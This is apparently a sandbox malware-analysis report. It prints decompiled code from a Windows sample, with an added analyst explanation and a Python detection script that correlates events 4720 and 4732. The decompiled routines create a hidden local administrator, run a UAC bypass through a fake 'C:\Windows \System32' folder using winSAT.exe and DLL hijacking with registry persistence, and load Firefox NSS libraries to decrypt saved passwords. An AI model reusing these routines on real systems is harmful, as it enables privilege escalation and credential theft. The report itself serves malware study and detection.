                                  				if(_v28 != 0) {
                                  					E00401B27(_t73, _t73);
                                  				}
                                  				E00405FEB(_a4);
                                  				return _t75;
                                  			}
                                  Instruction addresses: 0x0041144f, 0x00411458, 0x00411459, 0x0041145b, 0x00411461, 0x00411464, 0x00411479, 0x0041147b, 0x0041151d, 0x00411483, 0x00411487, 0x0041148e, 0x004114ad, 0x004114ad, 0x004114ad, 0x004114b1, 0x004114b4, 0x00411490, 0x00411490, 0x00411493, 0x0041149a, 0x0041149a, 0x004114ca, 0x004114d2, 0x004114d7, 0x004114de, 0x004114e1, 0x004114e6, 0x004114f1, 0x004114f7, 0x004114fd, 0x00411500, 0x00411508, 0x0041151b, 0x0041151b, 0x00411529, 0x0041152e, 0x00411533, 0x00411536, 0x00411536, 0x0041153e, 0x00411549

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                  • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 00411515
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNext
                                  • String ID:
                                  • API String ID: 1690352074-0
                                  • Opcode ID: ba9f4767d7951abe804ed14a5dde93c13626e19fe6767dc0f9c07e78e5a06133
                                  • Instruction ID: 3bc00f6ecbb92e03070013b76739fb9faa3866cd32c5f18363a362d6e3315d9a
                                  • Opcode Fuzzy Hash: ba9f4767d7951abe804ed14a5dde93c13626e19fe6767dc0f9c07e78e5a06133
                                  • Instruction Fuzzy Hash: FF315071D00209ABCB10EFA5C989BEEBBB9EF44315F10416EE505B3290DB789A84CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040D2B8(char _a4, char _a8) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v32;
                                  				void _v36;
                                  				void* _t22;
                                  				intOrPtr* _t25;
                                  				signed int _t30;
                                  				intOrPtr* _t38;
                                  
                                  				_t38 = _a4;
                                  				_t30 = 8;
                                  				memset( &_v36, 0, _t30 << 2);
                                  				_v36 =  *_t38;
                                  				_v24 = 1;
                                  				_v20 = 0;
                                  				_v32 =  *_a8;
                                  				_t22 =  &_v36;
                                  				_v16 = 0;
                                  				_v12 = 0x10201;
                                  				_v8 = 0;
                                  				__imp__NetUserAdd(0, 1, _t22, 0);
                                  				_t42 = _t22;
                                  				if(_t22 != 0) {
                                  					L3:
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				_a4 =  *_t38;
                                  				_t25 = E00410A8C( &_a8, _t42);
                                  				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
                                  				E00405FEB(_a8);
                                  				if(_t25 != 0) {
                                  					goto L3;
                                  				}
                                  				return 1;
                                  			}
                                  Instruction addresses: 0x0040d2c0, 0x0040d2c8, 0x0040d2ce, 0x0040d2d4, 0x0040d2dc, 0x0040d2df, 0x0040d2e4, 0x0040d2e7, 0x0040d2ed, 0x0040d2f0, 0x0040d2f7, 0x0040d2fa, 0x0040d300, 0x0040d302, 0x0040d333, 0x0040d333, 0x00000000, 0x0040d333, 0x0040d309, 0x0040d30c, 0x0040d31b, 0x0040d326, 0x0040d32d, 0x00000000, 0x00000000, 0x00000000

                                  APIs
                                  • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0055AD78,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D2FA
                                    • Part of subcall function 00410A8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                    • Part of subcall function 00410A8C: LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                    • Part of subcall function 00410A8C: GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                    • Part of subcall function 00410A8C: FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                  • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D31B
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                  • String ID:
                                  • API String ID: 188019324-0
                                  • Opcode ID: 8f238fb056e29698dfd204066f020e4d6850e83beaf88bf6cfc79c9a303f5c87
                                  • Instruction ID: 387118251825923e10dc775986f69852a0c78a11b32ac12897eb8a3676ac3e91
                                  • Opcode Fuzzy Hash: 8f238fb056e29698dfd204066f020e4d6850e83beaf88bf6cfc79c9a303f5c87
                                  • Instruction Fuzzy Hash: 56112E72D00208AFDB11DFA9C8849EEB7F8FF58354B00842BF951E7250D7B49A458B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%
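
E0040D2B8 is the account-creation primitive behind the "hides user accounts" signature: it zero-fills a 32-byte USER_INFO_1 (usri1_name = *_a4, usri1_password = *_a8, usri1_priv = 1 = USER_PRIV_USER, usri1_flags = 0x10201), calls NetUserAdd at information level 1, and on success calls NetLocalGroupAddMembers with a group name that E00410A8C resolves through AllocateAndInitializeSid (two sub-authorities, 0x20 and 0x220, i.e. 32-544, the BUILTIN\Administrators RID pair; the identifier authority is not visible in the call trace) and LookupAccountSidW. Resolving the name from the SID means the binary never carries the string "Administrators" and works on localized Windows, so a detection that matches on the group name alone misses it. The code below is an added example for this report, not code from the sample or the sandbox: it decodes the usri1_flags value and correlates Security-log event 4720 (user account created) with a following 4732 (member added to a security-enabled local group) for the same account SID, keyed on the group SID rather than its name. The event records are constructed to resemble a Get-WinEvent or SIEM export with account-management auditing enabled.

```python
"""USER_INFO_1 flag decoding and 4720/4732 correlation (added example)."""

USER_PRIV = {0: "USER_PRIV_GUEST", 1: "USER_PRIV_USER", 2: "USER_PRIV_ADMIN"}

# USER_INFO_1.usri1_flags bits from lmaccess.h.
UF_FLAGS = {
    0x00001: "UF_SCRIPT",
    0x00002: "UF_ACCOUNTDISABLE",
    0x00020: "UF_PASSWD_NOTREQD",
    0x00040: "UF_PASSWD_CANT_CHANGE",
    0x00200: "UF_NORMAL_ACCOUNT",
    0x10000: "UF_DONTEXPIREPASSWD",
}

BUILTIN_ADMINISTRATORS_SID = "S-1-5-32-544"


def decode_uf_flags(value):
    """Expand a usri1_flags value into symbolic bits; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(UF_FLAGS.items()) if value & bit]
    leftover = value & ~sum(UF_FLAGS)
    if leftover:
        names.append(hex(leftover))
    return names


def find_new_local_admins(events, window_seconds=600):
    """Correlate 4720 with a 4732 into BUILTIN\\Administrators within the window.

    events: iterable of dicts with 'time' (epoch seconds) and 'id'.
    4720 records carry SubjectUserName, TargetUserName and TargetSid (the new user);
    4732 records carry MemberSid (the added member), TargetUserName (group name)
    and TargetSid (group SID).
    """
    created = {}   # new account SID -> its 4720 record
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["id"] == 4732 and ev["TargetSid"] == BUILTIN_ADMINISTRATORS_SID:
            origin = created.get(ev["MemberSid"])
            if origin is not None and ev["time"] - origin["time"] <= window_seconds:
                hits.append({
                    "account": origin["TargetUserName"],
                    "sid": ev["MemberSid"],
                    "group": ev["TargetUserName"],       # localized name, e.g. Administrateurs
                    "created_by": origin["SubjectUserName"],
                    "seconds_between": ev["time"] - origin["time"],
                })
    return hits


# Constructed records; SIDs, names and times are made up.
SAMPLE_EVENTS = [
    {"time": 1625000000.0, "id": 4720, "SubjectUserName": "jdoe",
     "TargetUserName": "WindowsUpdate", "TargetSid": "S-1-5-21-1111-2222-3333-1010"},
    {"time": 1625000000.3, "id": 4732, "SubjectUserName": "jdoe",
     "MemberSid": "S-1-5-21-1111-2222-3333-1010",
     "TargetUserName": "Administrateurs", "TargetSid": "S-1-5-32-544"},
    # Benign: helpdesk adds an existing account to Remote Desktop Users.
    {"time": 1625003600.0, "id": 4732, "SubjectUserName": "helpdesk",
     "MemberSid": "S-1-5-21-1111-2222-3333-1050",
     "TargetUserName": "Remote Desktop Users", "TargetSid": "S-1-5-32-555"},
    # Benign: account created long before it was promoted.
    {"time": 1624900000.0, "id": 4720, "SubjectUserName": "helpdesk",
     "TargetUserName": "backupadm", "TargetSid": "S-1-5-21-1111-2222-3333-1051"},
    {"time": 1625004000.0, "id": 4732, "SubjectUserName": "helpdesk",
     "MemberSid": "S-1-5-21-1111-2222-3333-1051",
     "TargetUserName": "Administrateurs", "TargetSid": "S-1-5-32-544"},
]

if __name__ == "__main__":
    print("usri1_priv 1 =", USER_PRIV[1])
    print("usri1_flags 0x10201 =", " | ".join(decode_uf_flags(0x10201)))
    for hit in find_new_local_admins(SAMPLE_EVENTS):
        print("ALERT new local admin:", hit)
```

The window is deliberately short: the sample issues the two NetAPI calls back to back, so the 4720 and 4732 records land within the same second, while a legitimate promotion of an older account falls outside it. Both events require the "Audit User Account Management" and "Audit Security Group Management" subcategories to be enabled.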

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                  • Instruction ID: 2f4a3529709998775fb1cfce15acb4dc74d0562c3152b173c983c6aefab5c3d4
                                  • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                  • Instruction Fuzzy Hash: F0317976F0062ADFCB04DF98D8909AEB7F5BF89314B6681AAD401A7311D234E941CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 40%
                                  			E00410E5E(char __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v28;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				char _t23;
                                  				char* _t34;
                                  				intOrPtr _t38;
                                  				intOrPtr* _t40;
                                  				intOrPtr _t50;
                                  				intOrPtr _t52;
                                  				char _t53;
                                  				intOrPtr* _t59;
                                  				void* _t60;
                                  
                                  				_t50 = __edx;
                                  				asm("movaps xmm0, [0x41a8f0]");
                                  				_push(_t38);
                                  				_v12 = __ecx;
                                  				_t52 = 0x80000000;
                                  				_push(_t38);
                                  				asm("cpuid");
                                  				asm("movups [ebp-0x18], xmm0");
                                  				_t40 =  &_v28;
                                  				 *_t40 = 0x80000000;
                                  				 *((intOrPtr*)(_t40 + 4)) = _t38;
                                  				 *((intOrPtr*)(_t40 + 8)) = 0;
                                  				 *((intOrPtr*)(_t40 + 0xc)) = __edx;
                                  				_t23 = _v28;
                                  				_v8 = _t23;
                                  				if(_t23 >= 0x80000000) {
                                  					do {
                                  						_push(_t40);
                                  						asm("cpuid");
                                  						_t59 = _t40;
                                  						_t40 =  &_v28;
                                  						 *_t40 = _t52;
                                  						 *((intOrPtr*)(_t40 + 4)) = _t59;
                                  						 *((intOrPtr*)(_t40 + 8)) = 0;
                                  						 *((intOrPtr*)(_t40 + 0xc)) = _t50;
                                  						if(_t52 != 0x80000002) {
                                  							__eflags = _t52 - 0x80000003;
                                  							if(_t52 != 0x80000003) {
                                  								__eflags = _t52 - 0x80000004;
                                  								if(_t52 == 0x80000004) {
                                  									_push(0x10);
                                  									_push( &_v28);
                                  									_t34 =  &_v60;
                                  									goto L7;
                                  								}
                                  							} else {
                                  								_push(0x10);
                                  								_push( &_v28);
                                  								_t34 =  &_v76;
                                  								goto L7;
                                  							}
                                  						} else {
                                  							_push(0x10);
                                  							_push(_t40);
                                  							_t34 =  &_v92;
                                  							L7:
                                  							_push(_t34);
                                  							E0040102C();
                                  							_t60 = _t60 + 0xc;
                                  						}
                                  						_t52 = _t52 + 1;
                                  						_t64 = _t52 - _v8;
                                  					} while (_t52 <= _v8);
                                  				}
                                  				_t57 = E00401085(0x200);
                                  				E0040102C(_t24,  &_v92, 0x40);
                                  				_t53 = _v12;
                                  				E004031AF(E004034D1( &_v12, _t57), _t64, _t53);
                                  				E00405FEB(_v12);
                                  				E00401099(_t57);
                                  				return _t53;
                                  			}
                                  Instruction addresses: 0x00410e5e, 0x00410e64, 0x00410e6b, 0x00410e6e, 0x00410e71, 0x00410e7a, 0x00410e7b, 0x00410e7f, 0x00410e84, 0x00410e87, 0x00410e89, 0x00410e8c, 0x00410e8f, 0x00410e92, 0x00410e95, 0x00410e9a, 0x00410e9c, 0x00410ea0, 0x00410ea1, 0x00410ea3, 0x00410ea6, 0x00410ea9, 0x00410eab, 0x00410eae, 0x00410eb1, 0x00410eba, 0x00410ec6, 0x00410ecc, 0x00410ed9, 0x00410edf, 0x00410ee4, 0x00410ee6, 0x00410ee7, 0x00000000, 0x00410ee7, 0x00410ece, 0x00410ed1, 0x00410ed3, 0x00410ed4, 0x00000000, 0x00410ed4, 0x00410ebc, 0x00410ebe, 0x00410ec0, 0x00410ec1, 0x00410eea, 0x00410eea, 0x00410eeb, 0x00410ef0, 0x00410ef0, 0x00410ef3, 0x00410ef4, 0x00410ef4, 0x00410e9c, 0x00410f03, 0x00410f0c, 0x00410f11, 0x00410f23, 0x00410f2b, 0x00410f31, 0x00410f3d

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                  • Instruction ID: 82469f1c0b68b0bbf684dc2258c46a30b897b832454fe873a7492cc4e91153ea
                                  • Opcode Fuzzy Hash: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                  • Instruction Fuzzy Hash: 8021D871E002099BDB11DF99CC82AEFBBB8EF44314F14447BE605FB241E67469C58BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                  • Instruction ID: 252c24ed45863d0043dcfa88564879008cf283e5d062384433913211211ca2ab
                                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                  • Instruction Fuzzy Hash: E331E63AA0834A8FC710DF19C480967B7E5FF89314F4909AEE99687312D334F986CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00411B3F() {
                                  				intOrPtr* _t10;
                                  				intOrPtr* _t11;
                                  
                                  				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
                                  				_t11 =  *_t10;
                                  				while(_t11 != _t10) {
                                  					if(E00411BFD( *((intOrPtr*)(_t11 + 0x28))) == 0) {
                                  						return  *((intOrPtr*)(_t11 + 0x10));
                                  					}
                                  					_t11 =  *_t11;
                                  				}
                                  				return 0;
                                  			}
                                  Instruction addresses: 0x00411b4a, 0x00411b4d, 0x00411b5f, 0x00411b5b, 0x00000000, 0x00411b68, 0x00411b5d, 0x00411b5d, 0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                  • Instruction ID: 857fa1df320f071ac117177b4bc81004f99221c297faafc14dd0d3c935e2cdac
                                  • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                  • Instruction Fuzzy Hash: 06E0C233608510CBC760DB19D4009D6F3F6EF9037072A046AE65BA3631E328FC82C758
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00411E6D() {
                                  				intOrPtr _t4;
                                  
                                  				_t4 =  *[fs:0x30];
                                  				if(_t4 == 0) {
                                  					return 0;
                                  				} else {
                                  					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
                                  				}
                                  			}
                                  Instruction addresses: 0x00411e6d, 0x00411e75, 0x00411e87, 0x00411e77, 0x00411e84, 0x00411e84

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                  • Instruction ID: b4343b720a6aa60280e87e62ebe2b10670a5d6abc93b7d24aa6a6a1121a5b049
                                  • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                  • Instruction Fuzzy Hash: 8AD0EA38361A408FCB51CF18C584E01B3E4EB49760B098491E905CB735DB38EC40EA40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00411B38() {
                                  
                                  				return  *[fs:0x30];
                                  			}


                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 18%
                                  			E00412F55(void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				struct _SHELLEXECUTEINFOW _v76;
                                  				short _v2124;
                                  				short _v4172;
                                  				char _v6220;
                                  				void* _t63;
                                  				void* _t69;
                                  				void* _t72;
                                  				void* _t80;
                                  				void* _t81;
                                  
                                  				E004011C0(0x1848, _t72);
                                  				if(E0041111B() != 1) {
                                  					CloseHandle( *0x559cb0);
                                  					E00401052( &_v76, 0, 0x3c);
                                  					_v8 = 0;
                                  					__imp__Wow64DisableWow64FsRedirection( &_v8);
                                  					E00401052( &_v6220, 0, 0x800);
                                  					GetModuleFileNameW(0,  &_v6220, 0x800);
                                  					E00401052( &_v2124, 0, 0x800);
                                  					GetSystemDirectoryW( &_v2124, 0x800);
                                  					lstrcatW( &_v2124, L"\\winSAT.exe");
                                  					E00401052( &_v4172, 0, 0x800);
                                  					GetSystemDirectoryW( &_v4172, 0x800);
                                  					lstrcatW( &_v4172, L"\\winmm.dll");
                                  					CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
                                  					CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
                                  					CopyFileW( &_v2124, L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", 0);
                                  					CopyFileW( &_v4172, L"\\\\?\\C:\\Windows \\System32\\winmmd.dll", 0);
                                  					_t80 = E00412F0D(_t72);
                                  					RegSetValueExW(_t80, L"Virtual Machine Platform", 0, 1,  &_v6220, 0x1000);
                                  					RegCloseKey(_t80);
                                  					__imp__IsWow64Process(GetCurrentProcess(),  &_v12);
                                  					_push(0);
                                  					_push(0);
                                  					_push(2);
                                  					_push(0);
                                  					_push(0);
                                  					_push(0x40000000);
                                  					_push(L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
                                  					if(_v12 != 0) {
                                  						_t63 = CreateFileW();
                                  						_push(0);
                                  						_t81 = _t63;
                                  						_push( &_v16);
                                  						_push(0x3000);
                                  						_push(0x420408);
                                  					} else {
                                  						_t69 = CreateFileW();
                                  						_push(0);
                                  						_t81 = _t69;
                                  						_push( &_v16);
                                  						_push(0x2e00);
                                  						_push(0x423408);
                                  					}
                                  					WriteFile(_t81, ??, ??, ??, ??);
                                  					CloseHandle(_t81);
                                  					_v76.cbSize = 0x3c;
                                  					_v76.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
                                  					_v76.lpParameters = L"formal";
                                  					_v76.nShow = 0;
                                  					_v76.hwnd = 0;
                                  					_v76.lpDirectory = 0;
                                  					ShellExecuteExW( &_v76);
                                  					__imp__Wow64RevertWow64FsRedirection(_v8);
                                  					Sleep(0x7d0);
                                  					ExitProcess(0);
                                  				}
                                  				return 0;
                                  			}


                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00412F7F
                                  • Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                  • lstrcatW.KERNEL32 ref: 00412FF7
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                  • lstrcatW.KERNEL32 ref: 00413029
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F0D: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                    • Part of subcall function 00412F0D: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  • RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                  • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041309B
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130B6
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130CF
                                  • WriteFile.KERNEL32(00000000,00420408,00003000,?,00000000), ref: 004130E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004130EE
                                  • ShellExecuteExW.SHELL32(?), ref: 00413112
                                  • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0041311B
                                  • Sleep.KERNEL32(000007D0), ref: 00413126
                                  • ExitProcess.KERNEL32 ref: 0041312D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateProcessWow64$CloseDirectory$Handle$CopyCurrentOpenRedirectionSystemTokenlstrcat$DisableExecuteExitInformationModuleNameRevertShellSleepValueWrite
                                  • String ID: <$C:\Windows \System32\winSAT.exe$Virtual Machine Platform$\\?\C:\Windows \$\\?\C:\Windows \System32$\\?\C:\Windows \System32\WINMM.dll$\\?\C:\Windows \System32\winSAT.exe$\\?\C:\Windows \System32\winmmd.dll$\winSAT.exe$\winmm.dll$formal
                                  • API String ID: 371289168-2038174052
                                  • Opcode ID: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction ID: 38432614936820ae09a91b85de116fe05e5ca363bce1e2b84a591d1acda27bec
                                  • Opcode Fuzzy Hash: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction Fuzzy Hash: E9413371940258BBDB219BE1DC49ECF7FBCEF45710F104066F605E2190DB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E0040ADE3(void* __ecx, void* __edx, WCHAR* _a4) {
                                  				WCHAR* _v8;
                                  				long _v12;
                                  				WCHAR* _v16;
                                  				WCHAR* _v20;
                                  				char _v24;
                                  				char _v28;
                                  				WCHAR* _v32;
                                  				WCHAR* _v36;
                                  				WCHAR* _v40;
                                  				short _v560;
                                  				struct HINSTANCE__* _t135;
                                  				WCHAR* _t158;
                                  				intOrPtr _t194;
                                  				void* _t206;
                                  				void* _t216;
                                  				void* _t218;
                                  
                                  				_t206 = __edx;
                                  				_t158 = 0;
                                  				_t216 = __ecx;
                                  				E00401052( &_v560, 0, 0x104);
                                  				GetCurrentDirectoryW(0x104,  &_v560);
                                  				SetCurrentDirectoryW(_a4);
                                  				E0040357C( &_a4, _t206, 0, "\\");
                                  				E0040373F( &_v40,  &_a4);
                                  				E0040357C( &_v40, _t206, 0, L"nss3.dll");
                                  				E0040373F( &_v20,  &_a4);
                                  				E0040357C( &_v20, _t206, 0, L"msvcr120.dll");
                                  				E0040373F( &_v16,  &_a4);
                                  				E0040357C( &_v16, _t206, 0, L"msvcp120.dll");
                                  				E0040373F( &_v36,  &_a4);
                                  				E0040357C( &_v36, _t206, 0, L"mozglue.dll");
                                  				E0040373F( &_v32,  &_a4);
                                  				E0040357C( &_v32, _t206, 0, L"softokn3.dll");
                                  				E0040373F( &_v28,  &_a4);
                                  				E0040357C( &_v28, _t206, 0, L"msvcp");
                                  				E0040373F( &_v24,  &_a4);
                                  				E0040357C( &_v24, _t206, 0, L"msvcr");
                                  				_t218 = 0x5a;
                                  				_v12 = 0x104;
                                  				while(1) {
                                  					E0040373F( &_v8,  &_v28);
                                  					E0040357C(E00403384( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
                                  					if(PathFileExistsW(_v8) != 0) {
                                  						break;
                                  					}
                                  					_v12 = _v12 + 0xa;
                                  					E00405FEB(_v8);
                                  					_t224 = _v12 - 0x96;
                                  					_v8 = _t158;
                                  					if(_v12 != 0x96) {
                                  						continue;
                                  					} else {
                                  						while(1) {
                                  							L5:
                                  							E0040373F( &_v8,  &_v24);
                                  							E0040357C(E00403384( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
                                  							if(PathFileExistsW(_v8) != 0) {
                                  								break;
                                  							}
                                  							_t218 = _t218 + 0xa;
                                  							E00405FEB(_v8);
                                  							_v8 = _t158;
                                  							if(_t218 != 0x96) {
                                  								continue;
                                  							}
                                  							L9:
                                  							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
                                  							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
                                  							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
                                  							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
                                  							_t135 = LoadLibraryW(_v32);
                                  							 *(_t216 + 0xb8) = _t135;
                                  							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
                                  								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
                                  								if(_t194 != 0) {
                                  									_t230 = _t135;
                                  									if(_t135 != 0) {
                                  										_push(_t194);
                                  										 *((intOrPtr*)(_t216 + 0x68)) = E00411E88(_t194, "NSS_Init", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x80)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x7c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x70)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
